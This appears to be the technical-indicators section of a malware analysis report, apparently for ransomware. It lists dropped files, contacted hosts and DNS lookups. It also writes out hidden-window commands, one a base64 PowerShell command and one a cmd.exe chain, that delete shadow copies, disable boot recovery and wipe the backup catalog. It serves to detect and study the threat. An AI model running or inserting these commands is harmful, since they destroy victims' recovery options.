Technical information
- User Account Control (UAC)
- <DRIVERS>\etc\host
- <Current directory>\libeay32.dll
- <Current directory>\ssleay32.dll
- %PROGRAMDATA%\tvpssuq5mtdcnem4rta3x19uyxjpacgymsbnyxj0idiwmjagq3vtyxj0zxnpkv9fu2fhdcgxmc0xmy01msk=
- 'mz###enge.ga':443
- 'ap#.#pify.org':443
- 'ap#.#b-ip.com':443
- DNS ASK mz###enge.ga
- DNS ASK ap#.#pify.org
- DNS ASK ap#.#b-ip.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog ...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
- '%WINDIR%\syswow64\cmd.exe' /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog ...
- '<SYSTEM32>\vssvc.exe'